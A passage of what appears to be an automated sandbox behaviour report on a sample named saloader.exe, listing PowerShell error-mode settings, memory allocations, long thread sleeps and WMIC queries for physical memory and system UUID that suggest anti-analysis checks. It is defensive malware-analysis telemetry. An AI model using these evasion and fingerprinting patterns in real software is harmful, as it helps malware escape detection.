                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Desktop\saloader.exeMemory allocated: 2113D9B0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeMemory allocated: 21157390000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 598343Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 598234Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 598124Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 598015Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 597906Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 597796Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 597687Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 597578Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 597468Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 597359Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 597249Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 597128Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 597015Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\saloader.exeWindow / User API: threadDelayed 4448Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeWindow / User API: threadDelayed 5390Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6092Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3576Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2669Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 382Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4118Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 967Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4271Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2782Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2907
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1120
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992Thread sleep time: -18446744073709540s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992Thread sleep time: -100000s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992Thread sleep time: -99875s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992Thread sleep time: -99765s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992Thread sleep time: -99656s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992Thread sleep time: -99546s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992Thread sleep time: -99437s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992Thread sleep time: -99328s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992Thread sleep time: -99218s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992Thread sleep time: -99108s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992Thread sleep time: -98999s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992Thread sleep time: -98886s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992Thread sleep time: -98778s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992Thread sleep time: -98667s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992Thread sleep time: -98559s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992Thread sleep time: -98452s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992Thread sleep time: -598343s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992Thread sleep time: -598234s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992Thread sleep time: -598124s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992Thread sleep time: -598015s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992Thread sleep time: -597906s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992Thread sleep time: -597796s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992Thread sleep time: -597687s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992Thread sleep time: -597578s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992Thread sleep time: -597468s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992Thread sleep time: -597359s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992Thread sleep time: -597249s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992Thread sleep time: -597128s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\saloader.exe TID: 6992Thread sleep time: -597015s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7388Thread sleep count: 6092 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7392Thread sleep count: 3576 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7436Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7720Thread sleep count: 2669 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7708Thread sleep count: 382 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7736Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7920Thread sleep count: 4118 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7952Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7908Thread sleep count: 967 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7936Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8128Thread sleep count: 4271 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8132Thread sleep count: 2782 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8156Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8144Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7412Thread sleep count: 2907 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7412Thread sleep count: 1120 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7368Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7392Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT TotalPhysicalMemory FROM Win32_ComputerSystem
                        Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                        Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 100000Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 99875Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 99765Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 99656Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 99546Jump to behavior
                        Source: C:\Users\user\Desktop\saloader.exeThread delayed: delay time: 99437Jump to behavior
